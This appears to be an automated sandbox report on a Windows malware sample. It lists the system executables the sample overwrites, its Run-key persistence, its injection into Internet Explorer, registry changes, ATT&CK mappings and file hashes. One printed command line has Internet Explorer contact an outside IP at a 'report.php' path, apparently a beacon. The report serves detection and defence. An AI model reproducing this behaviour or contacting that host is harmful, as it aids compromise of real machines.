File created	C:\Windows\winsxs\amd64_microsoft-windows-setup-component_31bf3856ad364e35_6.1.7601.17514_none_905283bdc3e1d2d8\audit.exe_	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\winsxs\x86_microsoft-windows-d..ime-eashared-imepad_31bf3856ad364e35_6.1.7601.17514_none_3c93ac15fd731acf\IMEPADSV.EXE-	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\winsxs\x86_microsoft-windows-sxs_31bf3856ad364e35_6.1.7601.17514_none_b0540607b5e5d445\sxstrace.exe_	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe-	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\winsxs\amd64_microsoft-windows-blb-cli-main_31bf3856ad364e35_6.1.7600.16385_none_a749cec7a8b6bf08\wbadmin.exe_	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\winsxs\amd64_microsoft-windows-ocsetup_31bf3856ad364e35_6.1.7601.17514_none_41a3376575e751b4\ocsetup.exe_	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\winsxs\amd64_microsoft-windows-p..ting-lprportmonitor_31bf3856ad364e35_6.1.7601.17514_none_1229a6f0546e2346\lpq.exe_	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\winsxs\amd64_microsoft-windows-securestartup-prompt_31bf3856ad364e35_6.1.7600.16385_none_4c045ec8fda52d34\fveprompt.exe-	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\winsxs\msil_wsatconfig_b03f5f7f11d50a3a_6.1.7601.17514_none_dd3a06567424a01b\WsatConfig.exe_	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\Installer\{90140000-0011-0000-0000-0000000FF1CE}\misc.exe	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
File created	C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe-	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe

Modifies Internet Explorer settings 1 TTPs 34 IoCs

adware spyware

Modify Registry

T1112

Processes:

IEXPLORE.exeIEXPLORE.EXE

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	IEXPLORE.exe
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\IntelliForms	IEXPLORE.exe
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	IEXPLORE.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{62585EC1-0517-11EF-BE0C-E2E647A5CFB6} = "0"	IEXPLORE.exe
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.exe
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	IEXPLORE.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3"	IEXPLORE.exe
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Zoom	IEXPLORE.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "420440213"	IEXPLORE.exe
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\GPU	IEXPLORE.exe
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	IEXPLORE.exe
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\LowRegistry	IEXPLORE.exe
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	IEXPLORE.exe
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Toolbar	IEXPLORE.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 60f68b382499da01	IEXPLORE.exe
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	IEXPLORE.exe
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\InternetRegistry	IEXPLORE.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	IEXPLORE.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	IEXPLORE.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	IEXPLORE.exe
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	IEXPLORE.exe
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	IEXPLORE.exe
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	IEXPLORE.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000abb8596cc50c0546bfda6658dcffc23300000000020000000000106600000001000020000000cb30a82c77db4812be1be04f3a19982b7b21d8a0542c541479230e01aff58551000000000e8000000002000020000000eedfb002e0be7cac4d94457198d60f6ae6b9d194a7105e2b2e95aa64dbde10ab2000000056d30f184c82409d75e42e3ded5029fb3a94d39a82a7b6611b1ec857fbaecd1d40000000c127134b172f632c397b216dfd63958d0882da7360d7c4db0ddcabec1a268e811028f4a2c41a8e9f9b9622aa40e9db6d71cce6d4e00f679532769a5978c2764a	IEXPLORE.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000abb8596cc50c0546bfda6658dcffc23300000000020000000000106600000001000020000000b3a1fd292eb063554421fda8067ce7229716b1c50bef3cf8fcb207dcf65b875d000000000e8000000002000020000000483bfe0f2671ff9987562329e887c7e66fc965c1e71432c3b52909acc3cd442e9000000083dc8cd5b1fcbf4bca6b307a68eec934d9353d7cac6efd2b354a84bf6314e19de4ba109f135c58a3651c2e62bac2b04fd66e60b3f1e02dffdf067c45a4e09d2b85d288e618ee9bc36d606a88756e4a04eb076e2e5b106a8115f0ffddf3c79bbc8248d0f8168c5eda9a2b25d2c14bf746a2521dcf00146fcd1a4b3ce57b8a7c8b240dded5bd51701a7074d57d647849d6400000000070172c484668b1df00cc429f749b7227549672adb58cb575973daadd03f2fee40cee87ea6b4b54339783f03faaed766d69184d3deade9360e4c50ffecbebc2	IEXPLORE.exe
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\PageSetup	IEXPLORE.exe
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	IEXPLORE.exe
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	IEXPLORE.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	IEXPLORE.exe
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.exe
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\SearchScopes	IEXPLORE.exe
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	IEXPLORE.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

IEXPLORE.exe

pid process

2132 IEXPLORE.exe
Suspicious use of SetWindowsHookEx 6 IoCs

Processes:

IEXPLORE.exeIEXPLORE.EXE

pid process

2132 IEXPLORE.exe
2132 IEXPLORE.exe
2560 IEXPLORE.EXE
2560 IEXPLORE.EXE
2560 IEXPLORE.EXE
2560 IEXPLORE.EXE

pid	process
2132	IEXPLORE.exe

pid	process
2132	IEXPLORE.exe
2132	IEXPLORE.exe
2560	IEXPLORE.EXE
2560	IEXPLORE.EXE
2560	IEXPLORE.EXE
2560	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 8 IoCs

Processes:

045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exeIEXPLORE.exe

description	pid	process	target process
PID 2924 wrote to memory of 2132	2924	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe	IEXPLORE.exe
PID 2924 wrote to memory of 2132	2924	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe	IEXPLORE.exe
PID 2924 wrote to memory of 2132	2924	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe	IEXPLORE.exe
PID 2924 wrote to memory of 2132	2924	045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe	IEXPLORE.exe
PID 2132 wrote to memory of 2560	2132	IEXPLORE.exe	IEXPLORE.EXE
PID 2132 wrote to memory of 2560	2132	IEXPLORE.exe	IEXPLORE.EXE
PID 2132 wrote to memory of 2560	2132	IEXPLORE.exe	IEXPLORE.EXE
PID 2132 wrote to memory of 2560	2132	IEXPLORE.exe	IEXPLORE.EXE

C:\Users\Admin\AppData\Local\Temp\045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\045eb07a813c75105b31480ed74f5f4e_JaffaCakes118.exe"
1⤵
- Adds Run key to start application
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:2924

C:\Program Files\Internet Explorer\IEXPLORE.exe
"C:\Program Files\Internet Explorer\IEXPLORE" 212.33.237.86/images/1/report.php
2⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2132

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2132 CREDAT:275457 /prefetch:2
3⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2560

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Network Service Discovery

T1046

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\ose.exe
Filesize
13.5MB

MD5
7554639de4e9bca15e2b45319fd58150

SHA1
307a1d2cd9dad91e26afbff1f94257ff878074c2

SHA256
4018029b31f9495ecd36192af51a670a5bd45666467a17caf40b325c3cbba7dc

SHA512
7d09bbc6c8f26818599250fee9647f29ba4c6648043c8815dccf1167f6e68acd0ca470e9e88136ce50798b35082bb4c7769b885b40622efe616451845448d2a3

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
efb236e7386c7a62d71be10a401ad456

SHA1
612ca21f51edc071899314c61a56d022ad75b226

SHA256
2ba5490395102b7dac00d3d776da96c1cfd9eb64b456592ac51a303b609b5d33

SHA512
49a874285076196304e92a3c236ec148d75a7ff86c746fd31a7ae1dabcf1e1656b4c3634fdaa4384a94b5feda1435c93c82d87d385b6fab23e864b946af6f58f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
2cb87db8f4df19e4c791f81e7c8285e9

SHA1
fc00f122405d1e255615c001293c0ffe3ddecaae

SHA256
753d4f0b3e07342f079cef47c2edd5dde8827b1a0a0a817ec3800a02c1abcba2

SHA512
081ada69cc89abc750e47685df600619b412a4ab325fbd010efbb427555b19ce33442c16d63aa78ce3b4b7c31302384b0ca4fd122d85f23ae12fb6a3d50c36f1

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
1f6f6c88d2305d64c22402c8e4c8ebb7

SHA1
a999f64737a3cc6ce20fedcf610adc0c851a56a4

SHA256
9bb180b9edff6294e922dd767ef29c00b89c1d8ffb6feab6e37ee4e84f3c2d6d

SHA512
a53ad07978817f7d4a6d8eda5f231e3c304e8575408cc0d645d1732790f1fd217c8ad40df1e24c31b1b291d5eb3829333e1317f8e178656a75698bc4fbb4bd57

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
286e6e7b02565deb29a9f7466c650c32

SHA1
3a97dfe3ed227c302932a102f946b02009088e43

SHA256
c5d00cf2eef1fff02c78997fed656679f0325f9b10e92b8c2d315402c215f615

SHA512
bb4b3ded3117204c69895a4ef55f156b121de7f29130c67d5510bc30a183d8e34bad0271c282a0925498a8af13cdb3cade707d7350f6e58a48212a904609447e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
c1453adebbee30cac41fb642eb6e3e61

SHA1
0494b92379e43b04109b46a1737267cce9cf55fd

SHA256
b267d001f664821449ccfd88c08cde4f1340369710bb355920dae5f459881e8c

SHA512
f095cc0ac65180fc51b5e66a0e320c8251cda2c692e8375c23aa452ed4f905ff479d0cc2adf78e0a7497f79dc0ce76fed9566d7e85ce39a3b2a836d982307c78

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
cc14cb2121a031a88e7be46854c62a80

SHA1
af4f537b1ad74cbbd52b2bd41effbb2f8d020d09

SHA256
1c19c0fd0ad2a2e7ff87222b3054b4512c2616b7d6160b917e6cf501cbba3e97

SHA512
5db023e10e2192ed1b265d3c3fa72e08ca0a803cdb7f51d1a4f5705e0dd3c80c1e16fd24f85285ff8766c5949dd98c8a670fbfe36feedcaa7423ab0325bc3381

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
dcf8be110dbd6076bc65fc6d782017ae

SHA1
c826e5db335d3564874ace5adcf31f3b0d165b84

SHA256
99774d7f6373ff0fbd1c68e9aba009b7d04efcf7726cd28458e911646e4f77e0

SHA512
96ca61eda9383c4eb8102a4d6d849eddefd9a311510ed0e4f676d10f251eedfd4f767cbb7616835864c61448a45f33d8e76bb6f64eecf750859ab932f7c10239

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
c63cebe1f1e5a79d033bd5d6175a20b1

SHA1
3060386005b7023757f21b64e887d70d27f4b525

SHA256
395229cb89f59b97f93d4500763c72630b83efbcff414fd977b07bc1ebab8f3d

SHA512
d12ba5ede392537dd1fe257fe50376d2861bfb289872f44714577d33c9fa49fbb575dce6ac3a0baf625a6e0f8853e6d0fbf4a9bdf109b8d0840316095e02ab9a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
4c15be39328a34f7a32bb354286789a0

SHA1
b59bf815df5c1050522e23817c4a2ff9844a2212

SHA256
a241a800b5c7d6faf82b85a838e77a7bb3af4504bdd615c8a9d9c988f0289128

SHA512
9e2fa1e72b42566d4676b7d151f4e1825f64d821258e008e30a365f56c6fb7a1898f4dc2accb6969e61a7367cd45ab260519d67a8c068849ff62d2d237ef490d

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
8238b8caf43c0319f58717d350a24e56

SHA1
5349fbc9922231685b1e263cac7331bada405628

SHA256
53970249c4eb2628f8279bd26057ee46dff8c2abf63b14bb1a3679a4cd50bcbc

SHA512
fe2b661995776e8b66e866f8d8554ad7e9ff58e9d08e635730bc241254400534e6549ef840027fb2a35709f51225f8578debf070e232a1b753a43dd192287d0e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
a772fb8002f00e5d94a02528aa93bd00

SHA1
c8314e083764868062523c046714408f0cd39193

SHA256
13c2edafc1bfc38bf2d506fa7b559135a461e0934f7a4a17219d16331c2e45f8

SHA512
3c33bcc4bd22b7419d5dccbcca49a7becaf24133586698681bc654c7c7ac8eaa0e40b185b8bcfbf74a807a3d26b417fd3a08bf6152a4608539ed2caa3221fd42

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
ed74a463fc0a7cef17a587edcee8b7d0

SHA1
2804ab033fba9f7c12e1eccde2d963377cf4afa0

SHA256
11b90c2bc94fcf924859de005caea0cd485ea9f97e2939833d9c074660d29229

SHA512
c42cac34e67a6101db97f0c7af4b4d211949f13cf574e9465d4194fa64c3ce59f6955b54a102989f2446cce074f5f938ba11085997f6df2a28253a2302cfd9f0

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
93e71f821ff8342d4190b814677e5673

SHA1
37437ec604bc5080aba4bc9b4fdfba19667414b6

SHA256
d47b79f42daf054c83e8d7417994b526a3199d433c4423db290e36017e673bb2

SHA512
268daccf53b436eb101a7f2bcf509061e4bd5c0dc9c6f388852bfa71e55b427d8904cfddcfa2f5614536f956ec168f3f4532757bee06ad312f2215289edff733

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
1334898f280990b8b24c7baf2889219d

SHA1
034fdbdf49a95d41422e59ff988379bbc59178b6

SHA256
9618203ad401d0d8b5ec9f8ced655045a408f606be07974435882b50abf12ea5

SHA512
dfc3c075845167b6ca86d87cba49c2559f035849caf1dde94bafb126dd0275f200f2ba16ead932377c87a8dd65514bae6f551e7a4a905db8b18b42c46ad953e4

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
4a32b390904d3c95d5e0904ba8d0d2ff

SHA1
710532e13218dfca1383e4a85f4f327e5bbba097

SHA256
312bbca9116897255040d6698159403ca578986878407ee655ed7193119b4ca5

SHA512
66f5a731bdd4fddd5b26e0f31297e7f62caa29773d806f9f0304897338862ec03e36ef1ae55f8a366ac758010e700851e93343ad493f96a821fc2a0ea8d079ca

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
a0efb3bc1ecc26b371059d5efbef8a32

SHA1
b86087453ff77ca4793442bbc95017d20a5d506a

SHA256
81a19e036801ef5942983ffbaa8aee29c3a824dfda492e4f4346e54084e316ce

SHA512
09f2ad7ebf29b94006393725e871ba6ce485eb78c5db79af361e114898c8a54786e4b40534069241273db82a3392d885d62f5e23151919f9383eaaacd2f68802

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
5e5af0a2ba0ffecaeea7122f1dc6451d

SHA1
d87fe8b30ffa51407812caea6afcb1394e1cee05

SHA256
82d70c0918f824f7a2ff13711abb753017fb66a7d08f3e512231481acb9ff529

SHA512
a8f01614e09adb743e4c70a419a46e6250b1abcb0708c1574dacf061583b66769ba3150d1c411b62d4b44a9f7305cbd6ed799c998362d509efd8043e3714f5fe

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
c2c6da520fc5d7d9bc92b267f65b8ffc

SHA1
3fefef42a51a6be4b6ea5074876c1a08c72a8ec2

SHA256
c1cc5742f7f731baacff0d8aa66e6ac6480b919d4fd618c007041d3bdff92f7c

SHA512
03fe2be046efbbb12b5180bbd4d1bb2f23cfe98d36408c0e94ac16522869dc31a49bab376bb687e1397db4902afde9ca3e029e60ed5351eed4c2d3a8c2e6c92e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
9ed66291ca3944425afeefc412748d56

SHA1
42b2fb41b1ffc8619a7c4764381addc89137f4da

SHA256
ff33019b656d69c2ccb5d4415f2f38b16af2236d89bf448607f53239ab93d47d

SHA512
9963486ca73bc6e44f4e0fe49789d4aaab5bdd9474e925a9bf54d398ec8d8588cf8d6ae4e732d438cb813799b3eb449063fa50b845b13c9c9500796ae0387dcf

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab29C0.tmp
Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar2AD2.tmp
Filesize
177KB

MD5
435a9ac180383f9fa094131b173a2f7b

SHA1
76944ea657a9db94f9a4bef38f88c46ed4166983

SHA256
67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

SHA512
1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

Download Submit